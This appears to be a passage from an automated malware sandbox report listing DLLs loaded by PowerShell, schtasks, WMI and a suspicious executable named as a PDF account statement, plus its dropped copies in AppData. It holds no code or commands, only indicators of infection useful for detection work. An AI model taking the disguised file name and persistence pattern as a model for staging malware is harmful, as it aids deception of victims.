                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dllJump to behavior
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: vaultcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\SOA FOR APR 2024 PDF.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windowscodecs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: ntmarta.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\eeBIYZL.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: apphelp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: appresolver.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: bcp47langs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: slc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sppc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecorecommonproxystub.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                    Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wbemcomn.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: sspicli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasapi32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasman.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rtutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mswsock.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winhttp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iphlpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dhcpcsvc.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dnsapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: winnsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rasadhlp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: fwpuclnt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: secur32.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: schannel.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mskeyprotect.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ntasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncrypt.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ncryptsslp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vaultcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wintypes.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: mscoree.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: kernel.appcore.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: version.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: vcruntime140_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: ucrtbase_clr0400.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: uxtheme.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.storage.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: wldp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: profapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptsp.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: rsaenh.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: cryptbase.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: dwrite.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: amsi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: userenv.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: msasn1.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: gpapi.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windowscodecs.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: propsys.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: edputil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: urlmon.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: iertutil.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: srvcli.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: netutils.dll
                    Source: C:\Users\user\AppData\Roaming\BjTxJte\BjTxJte.exeSection loaded: windows.staterepositoryps.dll
